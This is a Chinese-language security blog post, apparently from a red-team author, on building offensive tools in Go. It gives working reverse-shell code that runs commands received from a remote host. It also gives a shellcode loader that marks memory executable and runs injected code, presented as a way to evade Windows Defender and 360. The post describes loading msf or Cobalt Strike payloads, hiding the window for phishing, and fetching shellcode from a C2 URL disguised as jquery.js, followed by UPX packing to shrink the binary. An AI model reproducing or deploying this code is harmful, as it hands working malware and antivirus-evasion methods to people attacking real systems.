<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="Windows Reverse Shell1、net.Dial回连：   1234backip :&#x3D; flag.String(&quot;d&quot;, &quot;127.0.0.1&quot;, &quot;ServerIpAdddress&quot;)backport :&#x3D; flag.Int(&quot;p&quot;, 1025, &quot;ServerPort&quot;)flag.Parse()conn, err :&#x3D; net.Dial(&quot;tcp&quot;, *backip+&quot;:&quot;+">
<meta property="og:type" content="article">
<meta property="og:title" content="Golang Socket &amp; ShellcodeLoader">
<meta property="og:url" content="https://x51.online/2019/11/26/Golang-study-bypass-wd/index.html">
<meta property="og:site_name" content="x51">
<meta property="og:description" content="Windows Reverse Shell1、net.Dial回连：   1234backip :&#x3D; flag.String(&quot;d&quot;, &quot;127.0.0.1&quot;, &quot;ServerIpAdddress&quot;)backport :&#x3D; flag.Int(&quot;p&quot;, 1025, &quot;ServerPort&quot;)flag.Parse()conn, err :&#x3D; net.Dial(&quot;tcp&quot;, *backip+&quot;:&quot;+">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://x51.online/images/pasted-51.png">
<meta property="og:image" content="https://x51.online/images/pasted-52.png">
<meta property="article:published_time" content="2019-11-26T13:50:38.000Z">
<meta property="article:modified_time" content="2020-06-28T03:08:03.079Z">
<meta property="article:author" content="x51">
<meta property="article:tag" content="x51">
<meta property="article:tag" content="渗透">
<meta property="article:tag" content="攻防">
<meta property="article:tag" content="红蓝对抗">
<meta property="article:tag" content="redteam">
<meta property="article:tag" content="x51&#39;blog">
<meta property="article:tag" content="渗透测试">
<meta property="article:tag" content="网络安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://x51.online/images/pasted-51.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Golang Socket &amp; ShellcodeLoader</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
      <link rel="alternate" href="/true" title="x51" type="application/atom+xml" />
    
<meta name="generator" content="Hexo 4.2.1"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/about/">关于</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2020/01/07/Pentestit-Lab-14-Writeup-Walkthrough/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2019/09/29/MSF+%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91%E6%94%BB%E5%87%BB%E5%86%85%E7%BD%91MS17-010/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=https://x51.online/2019/11/26/Golang-study-bypass-wd/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=https://x51.online/2019/11/26/Golang-study-bypass-wd/&text=Golang Socket &amp; ShellcodeLoader"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=https://x51.online/2019/11/26/Golang-study-bypass-wd/&title=Golang Socket &amp; ShellcodeLoader"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=https://x51.online/2019/11/26/Golang-study-bypass-wd/&is_video=false&description=Golang Socket &amp; ShellcodeLoader"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Golang Socket &amp; ShellcodeLoader&body=Check out this article: https://x51.online/2019/11/26/Golang-study-bypass-wd/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=https://x51.online/2019/11/26/Golang-study-bypass-wd/&title=Golang Socket &amp; ShellcodeLoader"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=https://x51.online/2019/11/26/Golang-study-bypass-wd/&title=Golang Socket &amp; ShellcodeLoader"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=https://x51.online/2019/11/26/Golang-study-bypass-wd/&title=Golang Socket &amp; ShellcodeLoader"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=https://x51.online/2019/11/26/Golang-study-bypass-wd/&title=Golang Socket &amp; ShellcodeLoader"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=https://x51.online/2019/11/26/Golang-study-bypass-wd/&name=Golang Socket &amp; ShellcodeLoader&description=&lt;p&gt;&lt;img src=&#34;/images/pasted-51.png&#34; alt=&#34;upload successful&#34;&gt; &lt;/p&gt;
&lt;h4 id=&#34;Windows-Reverse-Shell&#34;&gt;&lt;a href=&#34;#Windows-Reverse-Shell&#34; class=&#34;headerlink&#34; title=&#34;Windows Reverse Shell&#34;&gt;&lt;/a&gt;Windows Reverse Shell&lt;/h4&gt;&lt;p&gt;1、&lt;code&gt;net.Dial&lt;/code&gt;回连：  &lt;/p&gt;
&lt;figure class=&#34;highlight stata&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;backip := flag.&lt;span class=&#34;built_in&#34;&gt;String&lt;/span&gt;(&lt;span class=&#34;string&#34;&gt;&#34;d&#34;&lt;/span&gt;, &lt;span class=&#34;string&#34;&gt;&#34;127.0.0.1&#34;&lt;/span&gt;, &lt;span class=&#34;string&#34;&gt;&#34;ServerIpAdddress&#34;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;backport := flag.Int(&lt;span class=&#34;string&#34;&gt;&#34;p&#34;&lt;/span&gt;, 1025, &lt;span class=&#34;string&#34;&gt;&#34;ServerPort&#34;&lt;/span&gt;)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;flag.&lt;span class=&#34;keyword&#34;&gt;Parse&lt;/span&gt;()&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;conn, &lt;span class=&#34;keyword&#34;&gt;err&lt;/span&gt; := &lt;span class=&#34;keyword&#34;&gt;net&lt;/span&gt;.Dial(&lt;span class=&#34;string&#34;&gt;&#34;tcp&#34;&lt;/span&gt;, *backip+&lt;span class=&#34;string&#34;&gt;&#34;:&#34;&lt;/span&gt;+strconv.Itoa(*backport))&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=https://x51.online/2019/11/26/Golang-study-bypass-wd/&t=Golang Socket &amp; ShellcodeLoader"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#Windows-Reverse-Shell"><span class="toc-number">1.</span> <span class="toc-text">Windows Reverse Shell</span></a><ol class="toc-child"><li class="toc-item toc-level-6"><a class="toc-link" href="#补充："><span class="toc-number">1.0.1.</span> <span class="toc-text">补充：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#ShellCodeLoader-ByPass-WD-or-360"><span class="toc-number">2.</span> <span class="toc-text">ShellCodeLoader ByPass WD or 360</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#如何精简binary体积？"><span class="toc-number">3.</span> <span class="toc-text">如何精简binary体积？</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        Golang Socket &amp; ShellcodeLoader
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">x51</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2019-11-26T13:50:38.000Z" itemprop="datePublished">2019-11-26</time>
        
      
    </div>


      

      

    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p><img src="/images/pasted-51.png" alt="upload successful"> </p>
<h4 id="Windows-Reverse-Shell"><a href="#Windows-Reverse-Shell" class="headerlink" title="Windows Reverse Shell"></a>Windows Reverse Shell</h4><p>1、<code>net.Dial</code>回连：  </p>
<figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">backip := flag.<span class="built_in">String</span>(<span class="string">"d"</span>, <span class="string">"127.0.0.1"</span>, <span class="string">"ServerIpAdddress"</span>)</span><br><span class="line">backport := flag.Int(<span class="string">"p"</span>, 1025, <span class="string">"ServerPort"</span>)</span><br><span class="line">flag.<span class="keyword">Parse</span>()</span><br><span class="line">conn, <span class="keyword">err</span> := <span class="keyword">net</span>.Dial(<span class="string">"tcp"</span>, *backip+<span class="string">":"</span>+strconv.Itoa(*backport))</span><br></pre></td></tr></table></figure>
<a id="more"></a>
<p>2、接收远程命令  </p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">rcmd, _ := bufio.NewReader(conn).ReadString(<span class="string">'\n'</span>)</span><br></pre></td></tr></table></figure>
<p>3、执行</p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">Command</span><span class="params">(name <span class="keyword">string</span>, arg ...<span class="keyword">string</span>)</span> *<span class="title">Cmd</span></span>  </span><br><span class="line">out, err := exec.Command(strings.TrimSuffix(rcmd, <span class="string">"\n"</span>)).Output()</span><br></pre></td></tr></table></figure>


<h6 id="补充："><a href="#补充：" class="headerlink" title="补充："></a>补充：</h6><p>这样实现的一个简单的reverse shell，只能“一次性”使用。解决办法有两个：<br>1、添加一个死循环接受远端的命令  </p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span>&#123;</span><br><span class="line">	<span class="built_in">..</span><span class="built_in">..</span></span><br><span class="line">    <span class="built_in">..</span><span class="built_in">..</span></span><br><span class="line">    rcmd, _ := bufio.NewReader(conn).ReadString(<span class="string">'\n'</span>)</span><br><span class="line">    out, err := exec.Command(strings.TrimSuffix(rcmd, <span class="string">"\n"</span>)).Output()</span><br><span class="line">    <span class="built_in">..</span>.</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>2、调cmd.exe</p>
<figure class="highlight dockerfile"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">cmd</span><span class="bash"> := exec.Command(<span class="string">"C:\\Windows\\System32\\cmd.exe"</span>)</span></span><br></pre></td></tr></table></figure>
<h4 id="ShellCodeLoader-ByPass-WD-or-360"><a href="#ShellCodeLoader-ByPass-WD-or-360" class="headerlink" title="ShellCodeLoader ByPass WD or 360"></a>ShellCodeLoader ByPass WD or 360</h4><p>加载功能参考：<a href="https://github.com/brimstone/go-shellcode">https://github.com/brimstone/go-shellcode</a><br>code：  </p>
<figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> procVirtualProtect = syscall.NewLazyDLL(<span class="string">"kernel32.dll"</span>).NewProc(<span class="string">"VirtualProtect"</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">VirtualProtect</span><span class="params">(lpAddress unsafe.Pointer, dwSize <span class="keyword">uintptr</span>, flNewProtect <span class="keyword">uint32</span>, lpflOldProtect unsafe.Pointer)</span> <span class="title">bool</span></span> &#123;</span><br><span class="line">	ret, _, _ := procVirtualProtect.Call(</span><br><span class="line">		<span class="keyword">uintptr</span>(lpAddress),</span><br><span class="line">		<span class="keyword">uintptr</span>(dwSize),</span><br><span class="line">		<span class="keyword">uintptr</span>(flNewProtect),</span><br><span class="line">		<span class="keyword">uintptr</span>(lpflOldProtect))</span><br><span class="line">	<span class="keyword">return</span> ret &gt; <span class="number">0</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">Run</span><span class="params">(sc []<span class="keyword">byte</span>)</span></span> &#123;</span><br><span class="line">	<span class="comment">// TODO need a Go safe fork</span></span><br><span class="line">	<span class="comment">// Make a function ptr</span></span><br><span class="line">	f := <span class="function"><span class="keyword">func</span><span class="params">()</span></span> &#123;&#125;</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Change permissions on f function ptr</span></span><br><span class="line">	<span class="keyword">var</span> oldfperms <span class="keyword">uint32</span></span><br><span class="line">	<span class="keyword">if</span> !VirtualProtect(unsafe.Pointer(*(**<span class="keyword">uintptr</span>)(unsafe.Pointer(&amp;f))), unsafe.Sizeof(<span class="keyword">uintptr</span>(<span class="number">0</span>)), <span class="keyword">uint32</span>(<span class="number">0x40</span>), unsafe.Pointer(&amp;oldfperms)) &#123;</span><br><span class="line">		<span class="built_in">panic</span>(<span class="string">"Call to VirtualProtect failed!"</span>)</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Override function ptr</span></span><br><span class="line">	**(**<span class="keyword">uintptr</span>)(unsafe.Pointer(&amp;f)) = *(*<span class="keyword">uintptr</span>)(unsafe.Pointer(&amp;sc))</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Change permissions on shellcode string data</span></span><br><span class="line">	<span class="keyword">var</span> oldshellcodeperms <span class="keyword">uint32</span></span><br><span class="line">	<span class="keyword">if</span> !VirtualProtect(unsafe.Pointer(*(*<span class="keyword">uintptr</span>)(unsafe.Pointer(&amp;sc))), <span class="keyword">uintptr</span>(<span class="built_in">len</span>(sc)), <span class="keyword">uint32</span>(<span class="number">0x40</span>), unsafe.Pointer(&amp;oldshellcodeperms)) &#123;</span><br><span class="line">		<span class="built_in">panic</span>(<span class="string">"Call to VirtualProtect failed!"</span>)</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="comment">// Call the function ptr it</span></span><br><span class="line">	f()</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>测试了三种方法：<br>1、命令行传递shellcode，shellcode可用msf生成，或cobalstrike的payload（选c），适用反弹shell（rce or webshell）<br>2、将shellcode硬编码到程序中，会弹框，编译添加参数<code>-ldflags=&quot;-H windowsgui&quot;</code>，适用钓鱼，shellcode需处理。<br>3、远程加载（命令行）：<br><code>main1.exe http://0.0.0.0/jquery.js</code>，可在程序硬编码远程C2地址，效果如下：  </p>
<p><img src="/images/pasted-52.png" alt="upload successful"><br>（缺点是添加了网络包net/http后程序体积很大） </p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"> D:\Tools\upx<span class="number">-3.95</span>-win64 的目录</span><br><span class="line"></span><br><span class="line"><span class="number">11</span>/<span class="number">27</span>/<span class="number">2019</span>  <span class="number">03</span>:<span class="number">58</span> PM           <span class="number">531</span>,<span class="number">456</span> main.exe</span><br><span class="line">               <span class="number">1</span> 个文件        <span class="number">531</span>,<span class="number">456</span> 字节</span><br><span class="line">               <span class="number">0</span> 个目录 <span class="number">260</span>,<span class="number">310</span>,<span class="number">085</span>,<span class="number">632</span> 可用字节</span><br></pre></td></tr></table></figure>

<p>从测试来看方式2效率最高，也容易扩展，大小可接受，但方法3不落地。</p>
<h4 id="如何精简binary体积？"><a href="#如何精简binary体积？" class="headerlink" title="如何精简binary体积？"></a>如何精简binary体积？</h4><p>1、精简代码<br>往往一件看似美好的事物背后总是带着点缺陷，Golang的静态编译特性运行静态无依赖，但身材却略显“臃肿”，代码分析插件：<code>goweight</code>（GitHub）可以帮助我们进行分析程序体积分布比例。适度减少程序依赖项，让代码更加精小，比如在完全可以去掉任何打印功能的情况下，就可以省出一个<code>fmt</code>大小。</p>
<figure class="highlight angelscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">D:\CodeSrc\go\src\demo\sc\main&gt;goweight</span><br><span class="line">  <span class="number">3.5</span> MB runtime</span><br><span class="line">  <span class="number">1.4</span> MB <span class="built_in">ref</span>lect</span><br><span class="line">  <span class="number">828</span> kB syscall</span><br><span class="line">  <span class="number">513</span> kB time</span><br><span class="line">  <span class="number">450</span> kB fmt</span><br><span class="line">  <span class="number">445</span> kB os</span><br><span class="line">  <span class="number">428</span> kB <span class="built_in">int</span>ernal/<span class="built_in">ref</span>lectlite</span><br><span class="line">  <span class="number">285</span> kB strconv</span><br><span class="line">  <span class="number">281</span> kB <span class="built_in">string</span>s</span><br><span class="line">  <span class="number">276</span> kB <span class="built_in">int</span>ernal/poll</span><br><span class="line">  <span class="number">230</span> kB unicode</span><br><span class="line">  <span class="number">218</span> kB math</span><br><span class="line">  <span class="number">166</span> kB sync</span><br><span class="line">  <span class="number">160</span> kB <span class="built_in">int</span>ernal/syscall/windows</span><br><span class="line">  <span class="number">145</span> kB <span class="built_in">int</span>ernal/syscall/windows/registry</span><br><span class="line">  <span class="number">143</span> kB io</span><br><span class="line">  <span class="number">118</span> kB sort</span><br><span class="line">   <span class="number">50</span> kB <span class="built_in">int</span>ernal/fmtsort</span><br><span class="line">   <span class="number">50</span> kB encoding/hex</span><br><span class="line">   <span class="number">43</span> kB <span class="built_in">int</span>ernal/cpu</span><br><span class="line">   <span class="number">40</span> kB math/bits</span><br><span class="line">   <span class="number">27</span> kB unicode/utf8</span><br><span class="line">   <span class="number">27</span> kB errors</span><br><span class="line">   <span class="number">20</span> kB sync/atomic</span><br><span class="line">   <span class="number">16</span> kB <span class="built_in">int</span>ernal/bytealg</span><br><span class="line">   <span class="number">15</span> kB runtime/<span class="built_in">int</span>ernal/atomic</span><br><span class="line">   <span class="number">15</span> kB <span class="built_in">int</span>ernal/testlog</span><br><span class="line">   <span class="number">12</span> kB runtime/<span class="built_in">int</span>ernal/sys</span><br><span class="line">  <span class="number">9.0</span> kB demo/sc/shellcode</span><br><span class="line">  <span class="number">8.5</span> kB unicode/utf16</span><br><span class="line">  <span class="number">5.2</span> kB <span class="built_in">int</span>ernal/syscall/windows/sysdll</span><br><span class="line">  <span class="number">4.2</span> kB <span class="built_in">int</span>ernal/race</span><br><span class="line">  <span class="number">2.6</span> kB <span class="built_in">int</span>ernal/oserror</span><br><span class="line">  <span class="number">1.7</span> kB runtime/<span class="built_in">int</span>ernal/math</span><br></pre></td></tr></table></figure>
<p>btw，写了一个通过http加载远程shellcode的功能，结果发现打包后体积太大，goweight分析结果：  </p>
<figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">D:<span class="symbol">\C</span>odeSrc<span class="symbol">\g</span>o<span class="symbol">\s</span>rc<span class="symbol">\d</span>emo<span class="symbol">\s</span>c<span class="symbol">\m</span>ain&gt;goweight</span><br><span class="line">  3.9 MB net/http</span><br><span class="line">  3.5 MB runtime</span><br><span class="line">  1.7 MB crypto/tls</span><br><span class="line">  1.4 MB net</span><br></pre></td></tr></table></figure>
<p>从结果可以看到http的占用率太高，那么这个功能不要也罢。<br>2、<code>ldflags</code>参数去掉符号信息、调试信息<br>先看看直接编译的结果：  </p>
<figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">x51 D:<span class="symbol">\.</span>.<span class="symbol">\.</span>.<span class="symbol">\.</span>.<span class="symbol">\.</span>.<span class="symbol">\.</span>.<span class="symbol">\m</span>ain ❯❯❯ go build main.go</span><br><span class="line">x51 D:<span class="symbol">\.</span>.<span class="symbol">\.</span>.<span class="symbol">\.</span>.<span class="symbol">\.</span>.<span class="symbol">\.</span>.<span class="symbol">\m</span>ain ❯❯❯ ls</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    目录: D:<span class="symbol">\C</span>odeSrc<span class="symbol">\g</span>o<span class="symbol">\s</span>rc<span class="symbol">\d</span>emo<span class="symbol">\s</span>c<span class="symbol">\m</span>ain</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Mode                LastWriteTime         Length Name</span><br><span class="line">----                -------------         ------ ----</span><br><span class="line">-a----       11/28/2019   7:09 PM        2141184 main.exe</span><br><span class="line">-a----       11/28/2019   7:08 PM           1929 main.go</span><br></pre></td></tr></table></figure>
<p>再来看添加<code>-ldflags</code>参数后的结果：  </p>
<figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">x51 D:\<span class="string">..</span>\<span class="string">..</span>\<span class="string">..</span>\<span class="string">..</span>\<span class="string">..</span>\main ❯❯❯ go build -ldflags=<span class="string">"-s -w"</span> main.go</span><br><span class="line">x51 D:\<span class="string">..</span>\<span class="string">..</span>\<span class="string">..</span>\<span class="string">..</span>\<span class="string">..</span>\main ❯❯❯ <span class="keyword">ls</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    目录: D:\CodeSrc\go\src\demo\sc\main</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Mode                LastWriteTime         Length Name</span><br><span class="line"><span class="params">----</span>                <span class="params">-------------</span>         <span class="params">------</span> <span class="params">----</span></span><br><span class="line">-a<span class="params">----</span>       11/28/2019   7<span class="function">:09</span> PM        1549312 main.exe</span><br><span class="line">-a<span class="params">----</span>       11/28/2019   7<span class="function">:08</span> PM           1929 main.go</span><br></pre></td></tr></table></figure>
<p>很明显带参数编译的体积要更小。<br>3、upx  </p>
<figure class="highlight stata"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">D</span>:\Tools\upx-3.95-win64&gt;upx.exe</span><br><span class="line">                       Ultimate Packer <span class="keyword">for</span> eXecutables</span><br><span class="line">                          <span class="keyword">Copyright</span> (C) 1996 - 2018</span><br><span class="line">UPX 3.95w       Markus Oberhumer, Laszlo Molnar &amp; John Reiser   Aug 26th 2018</span><br><span class="line"></span><br><span class="line">Usage: upx [-123456789dlthVL] [-qvfk] [-o <span class="keyword">file</span>] <span class="keyword">file</span>..</span><br><span class="line"></span><br><span class="line">Commands:</span><br><span class="line">  -1     <span class="keyword">compress</span> faster                   -9    <span class="keyword">compress</span> better</span><br><span class="line">  -<span class="keyword">d</span>     decompress                        -<span class="keyword">l</span>    <span class="keyword">list</span> compressed <span class="keyword">file</span></span><br><span class="line">  -t     <span class="keyword">test</span> compressed <span class="keyword">file</span>              -V    <span class="keyword">display</span> <span class="keyword">version</span> number</span><br><span class="line">  -<span class="keyword">h</span>     give <span class="keyword">more</span> <span class="keyword">help</span>                    -<span class="keyword">L</span>    <span class="keyword">display</span> software license</span><br><span class="line">Options:</span><br><span class="line">  -q     be quiet                          -v    be verbose</span><br><span class="line">  -oFILE write output to '<span class="keyword">FILE</span>'</span><br><span class="line">  -f     force compression of suspicious files</span><br><span class="line">  -k     <span class="keyword">keep</span> backup files</span><br><span class="line"><span class="keyword">file</span>..   executables to (<span class="keyword">de</span>)<span class="keyword">compress</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">Type</span> 'upx --<span class="keyword">help</span>' <span class="keyword">for</span> <span class="keyword">more</span> detailed <span class="keyword">help</span>.</span><br><span class="line"></span><br><span class="line">UPX comes with ABSOLUTELY <span class="keyword">NO</span> WARRANTY; <span class="keyword">for</span> details visit https:<span class="comment">//upx.github.io</span></span><br></pre></td></tr></table></figure>
<p>upx压缩处理的效果还是非常不错的，我们拿上面去除调试信息的exe直接压缩：  </p>
<figure class="highlight fortran"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">     <span class="keyword">File</span> <span class="built_in">size</span>         Ratio      <span class="keyword">Format</span>      <span class="keyword">Name</span></span><br><span class="line">--------------------   ------   -----------   -----------</span><br><span class="line"><span class="number">1549312</span> -&gt;    <span class="number">538624</span>   <span class="number">34.77</span>%    win64/pe     main.exe                                                                                                       Packed <span class="number">1</span> <span class="keyword">file</span>.</span><br></pre></td></tr></table></figure>
<p>从1.5M多压缩到500多k，nice，注意到upx有个参数“-9”，可以理解为最大程度压缩吧，对比看一下：</p>
